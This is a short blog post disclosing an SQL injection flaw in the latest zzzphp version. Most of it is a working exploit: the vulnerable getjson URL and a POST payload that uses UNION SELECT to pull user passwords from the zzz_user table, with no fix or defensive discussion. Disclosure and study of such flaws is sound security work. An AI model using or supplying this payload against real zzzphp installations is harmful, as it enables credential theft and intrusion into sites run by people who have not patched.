There is a sqli vuln in zzzphp latest version which can be selected the user's password by the attackers.

vuln url:http://127.0.0.1/zzzphp/form/index.php?module=getjson
payload:table=gbook&where[]=1=1 union select password from zzz_user&col=1
submit it post
then we can see the password in the response

分类: 技术

0 条评论

发表评论

电子邮件地址不会被公开。 必填项已用*标注